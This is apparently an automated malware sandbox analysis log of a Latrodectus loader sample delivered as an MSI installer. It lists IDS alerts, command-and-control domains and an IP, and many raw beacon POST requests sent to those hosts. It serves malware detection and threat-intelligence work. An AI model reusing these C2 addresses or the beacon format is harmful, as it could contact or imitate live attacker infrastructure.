            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58097 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58107 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58100 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58087 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58095 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58103 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58094 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58092 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58089 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58105 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58091 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58110 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58114 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58104 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58108 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58109 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58086 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58106 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58112 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58111 -> 172.67.191.232:443
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 80.66.76.106 8877Jump to behavior
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://rolefenik.com/test/
            Source: Malware configuration extractorURLs: https://ergiholim.com/test/
            Source: global trafficTCP traffic: 192.168.2.8:49705 -> 80.66.76.106:8877
            Source: Joe Sandbox ViewIP Address: 80.66.76.106 80.66.76.106
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58093 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58089 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58091 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58096 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58108 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58087 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58100 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58106 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58112 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58101 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58102 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58097 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58103 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58107 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58098 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58086 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58088 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58110 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58109 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58114 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58094 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58104 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58090 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58092 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58105 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58111 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58095 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49706
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:58082
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1lHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1nHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1mHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1hHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1gHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1jHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1iHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1tHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1sHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kC6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kCqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kCaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kCKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kD6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kDqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kDaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kDKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kA6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1kAqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1nC6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1nCqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1nCaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1nCKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1nD6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1nDqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1nDaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 0Cache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exeCode function: 11_2_02BE5078 InternetReadFile,11_2_02BE5078
            Source: global trafficDNS traffic detected: DNS query: xomamox.com
            Source: global trafficDNS traffic detected: DNS query: rolefenik.com
            Source: unknownHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: FKbPpAITwn1lHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAocUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3076305289.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866404374.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3076305289.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866404374.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3076305289.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866404374.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
